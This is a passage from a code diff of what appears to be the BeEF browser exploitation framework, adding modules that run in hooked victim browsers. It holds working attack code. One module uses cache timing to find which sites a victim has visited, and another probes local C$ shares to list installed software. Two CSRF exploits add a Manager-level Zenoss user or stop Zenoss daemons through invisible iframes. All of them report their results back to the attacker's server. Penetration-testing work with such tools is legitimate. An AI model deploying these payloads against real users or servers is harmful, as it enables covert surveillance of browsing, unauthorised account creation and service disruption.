'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
{ 'category': 'Coding' },
{ 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
{ 'category': 'Security' },
{ 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
{ 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
{ 'category': 'Email' },
{ 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/**********************
* MAIN STATE MACHINE *
**********************/
var log_area;
var target_off = 0;
var attempt = 0;
var confirmed_visited = false;
var current_url, current_name;
var wait_cycles;
var frame_ready = false;
var start, stop, urls;
/* The frame was just pointed to data:... at this point. Initialize a new test, giving the
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read2, 0);
} else {
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
will be aborted by maybe_test_next(). */
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
function maybe_test_next() {
frame_ready = false;
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
target_off++;
}
if (confirmed_visited) {
log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited');
}
if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) {
if (!confirmed_visited)
//continue;
log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited');
confirmed_visited = false;
target_off++;
attempt = 0;
maybe_test_next();
} else {
current_url = targets[target_off].urls[attempt % targets[target_off].urls.length];
current_name = targets[target_off].name;
attempt++;
perform_check();
}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;
start_stuff();
});

26
modules/browser/get_visited_domains/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_visited_domains:
enable: true
category: "Browser"
name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]

22
core/main/models/dynamicpayloads.rb → modules/browser/get_visited_domains/module.rb
View File

@@ -13,23 +13,13 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class DynamicPayloads
include DataMapper::Resource
storage_names[:default] = 'core_dynamicpayloads'
property :id, Serial
property :name, Text, :lazy => false
has n, :dynamic_payload_info
class Get_visited_domains < BeEF::Core::Command
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end
end
end

2
modules/browser/rickroll/command.js
View File

@@ -19,7 +19,7 @@ beef.execute(function() {
$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
});

39
modules/browser/unhook/command.js Normal file
View File

@@ -0,0 +1,39 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request");
// remove script tag(s)
try {
var scripts = document.getElementsByTagName("script");
for (var i=0; i<scripts.length; i++) {
if (scripts[i].src.match(/https?:\/\/[^\/]+\/hook\.js/)) {
scripts[i].parentNode.removeChild(scripts[i]);
}
}
} catch (e) { }
// attempt to clean up DOM
try {
delete beef;
delete BEEFHOOK;
beef_init=null;
BeefJS=null;
} catch (e) { }
});

25
modules/browser/unhook/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
unhook:
enable: true
category: "Browser"
name: "Unhook"
description: "This module removes the BeEF hook from the hooked page."
authors: ["bcoles"]
target:
working: ["All"]

24
modules/browser/unhook/module.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Unhook < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
end

3
modules/exploits/safari_launch_app/config.yaml
View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Exploits"
name: "Safari Launch App"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details."
notes: "Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
authors: ["antisnatchor"]
target:
user_notify: ["S"]

33
modules/exploits/zenoss_add_user_csrf/command.js Normal file
View File

@@ -0,0 +1,33 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var user_level = '<%= @user_level %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_add_user_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/zenoss_add_user_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
name: "Zenoss Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

46
modules/exploits/zenoss_add_user_csrf/module.rb Normal file
View File

@@ -0,0 +1,46 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'user_level',
'type' => 'combobox',
'ui_label' => 'User Level',
'store_type' => 'arraystore',
'store_fields' => ['user_level'],
'store_data' => [
['Manager'],
['ZenManager'],
['ZenUser']
],
'emptyText' => 'Select a user level ("Manager" is highest)',
'valueField' => 'user_level',
'displayField' => 'user_level',
'mode' => 'local',
'autoWidth' => true
},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

32
modules/exploits/zenoss_daemon_csrf/command.js Normal file
View File

@@ -0,0 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var service = '<%= @service %>';
var action = '<%= @action %>';
var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_daemon_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/zenoss_daemon_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
name: "Zenoss Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

70
modules/exploits/zenoss_daemon_csrf/module.rb Normal file
View File

@@ -0,0 +1,70 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_daemon_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'service',
'type' => 'combobox',
'ui_label' => 'Daemon',
'store_type' => 'arraystore',
'store_fields' => ['service', 'description'],
'store_data' => [
['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
['zopectl', 'zopectl (The Zope open source web application server)'],
['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
['zenjobs', 'zenjobs (Zenjobs)'],
['zenping', 'zenping (ICMP ping status monitoring)'],
['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
['zenjmx', 'zenjmx (ZenJMX)']
],
'emptyText' => 'Select a daemon',
'valueField' => 'service',
'displayField' => 'service', #'description',
'mode' => 'local',
'autoWidth' => true
},
{ 'name' => 'action',
'type' => 'combobox',
'ui_label' => 'Action',
'store_type' => 'arraystore',
'store_fields' => ['action'],
'store_data' => [
['Start'],['Stop'],['Restart']
],
'valueField' => 'action',
'displayField' => 'action',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

7
modules/host/detect_cups/config.yaml
View File

@@ -22,4 +22,9 @@ beef:
description: "This module attempts to detect Common UNIX Printing System (CUPS) on localhost on the default port 631."
authors: ["bcoles"]
target:
working: ["ALL"]
working:
ALL:
os: ["Linux"]
not_working:
ALL:
os: ["All"]

3
modules/host/detect_google_desktop/config.yaml
View File

@@ -22,4 +22,7 @@ beef:
description: "This module attempts to detect Google Desktop running on the default port 4664."
authors: ["bcoles"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["ALL"]

3
modules/host/detect_protocol_handlers/config.yaml
View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Host"
name: "Get Protocol Handlers"
description: "This module attempts to identify protocol handlers present on the hooked browser."
notes: "Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist"
description: "This module attempts to identify protocol handlers present on the hooked browser. Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist."
authors: ["bcoles"]
target:
working: ["IE"]

159
modules/host/detect_software/command.js Normal file
View File

@@ -0,0 +1,159 @@
//
// detect software
//
beef.execute(function() {
var files = [
"Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif",
"NetWaiting/Logon.bmp",
"Windows NT/Pinball/table.bmp",
"InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp",
"Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif",
"Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif",
"Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif",
"Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif",
"Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif",
"eFax Messenger 4.3/Media/ENU/confidential.gif",
"InterActual/InterActual Player/help/images/btm_bckg.gif",
"Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif",
"Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif",
"Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif",
"Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif",
"Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif",
"Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif",
"Mozilla Firefox/res/broken-image.gif",
"Mozilla Thunderbird/res/grabber.gif",
"TechSmith/SnagIt 9/HTML_Content/add-in.gif",
"VMware/VMware Player/help/images/collapse.gif",
"WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif",
"FreeMind/accessories/hide.png",
"HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png",
"Movie Maker/Shared/news.png",
"MySQL/MySQL Tools for 5.0/images/grt/db/column.png",
"Safari/Safari.resources/compass.png",
"ThinkVantage Fingerprint Software/rsc/logon.png",
"Trillian/plugins/GoodNews/icons/logo.png",
"Trillian/users/default/cache/account-AIM-offline.png",
"VideoLAN/VLC/http/images/delete.png",
"Virtual Earth 3D/Data/Atmosphere.png",
"Windows Media Connect 2/wmc_bw120.png",
"Analog Devices/SoundMAX/CPApp.ico",
"AT&T/Communication Manager/desktop.ico",
"ATI Technologies/ATI.ACE/branding.ico",
"Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico",
"CDBurnerXP Pro 3/Resources/cdbxp.ico",
"DivX/divxdotcom.ico",
"Fiddler/IE_Toolbar.ico",
"HP/SwfScan/SwfScan.ico",
"iPhone Configuration Utility/Document-Config.ico",
"Microsoft Device Emulator/1.0/emulator.ico",
"MSN/MSNCoreFiles/Install/msnms.ico",
"OpenVPN/openvpn.ico",
"Paros/paros_logo.ico",
"Adobe/Photoshop 6.0/Help/images/banner.jpg",
"iTunes/iTunes.Resources/genre-blues.jpg",
"Source Insight 3/images/SubBack.jpg",
"Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG",
"Microsoft Office/OFFICE11/REFBAR.ICO",
"Microsoft Office/OFFICE12/REFBAR.ICO",
"Windows Media Player/Network Sharing/wmpnss_color48.jpg",
]
var descriptions = [
"Adobe Reader 9.0",
"WinDVD",
"Windows Pinball",
"Conexant NetWaiting",
"JRE 1.6.0_22",
"Roxio 9.0",
"Windows Weather Gadget",
"Pinnacle",
"Adobe Reader 8.0",
"eFax Manager 4.0",
"Interactual Player",
"Quickbooks",
"JRE 1.5.0_11",
"Flash 8",
"Microsoft CRM",
"Microsoft Live Meeting 8",
"Microsoft Visual Studio 8",
"Mozilla Firefox",
"Mozilla Thunderbird",
"Snagit 9",
"VMware Player",
"Omnipeek Personal",
"Freemind",
"HP Digital Imaging",
"Windows Movie Maker",
"MySQL Tools for 5.0",
"Safari",
"ThinkVantage Fingerprint Software",
"Trillian Plugin GoodNews",
"Trillian",
"VideoLAN VLC",
"Microsoft Virtial Earth 3D",
"Windows Media Connect 2",
"SoundMAX",
"AT&T Communications Manager",
"ATI Technologies ATI.ACE",
"Canon ZoomBrowser",
"CDBurnerXP Pro 3",
"DivX",
"Fiddler",
"HP's SwfScan",
"iPhone Configuration Utility",
"Microsoft Device Emulator",
"MSN",
"OpenVPN",
"Paros",
"Adobe Photoshop 6.0",
"iTunes",
"Source Insight 3",
"Canon CameraWindow",
"Microsoft Office 11",
"Microsoft Office 12",
"Windows Media Player"
]
if (navigator.appName != "Microsoft Internet Explorer") {
result = 'Software detection module only works in IE (so far)';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// Using IE lets test for smb enum
} else {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif";
var pic2 = new Image();
pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg";
if (pic1.width == 28 && pic2.width == 28) {
result = 'SMB method of detecting software failed';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// smb enum is working lets look for installed software
} else {
result = '';
var sixtyfourbitvista = 0;
for (var x = 0; x < files.length; x++) {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
} else {
pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
sixtyfourbitvista = 1;
}
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
}
}
});

13
modules/host/detect_software/config.yaml Normal file
View File

@@ -0,0 +1,13 @@
# detect software
#
beef:
module:
Detect_software:
enable: true
category: "Host"
name: "Detect Software"
description: "Detects software installed on the host (Internet Explorer only)"
authors: ["mh"]
target:
working: ["IE"]
not_working: ["All"]

12
modules/host/detect_software/module.rb Normal file
View File

@@ -0,0 +1,12 @@
# detect software
#
class Detect_software < BeEF::Core::Command
def post_execute
content = {}
content['detect_software'] = @datastore['detect_software']
save content
end
end

30
modules/host/get_physical_location/command.js Executable file
View File

@@ -0,0 +1,30 @@
//
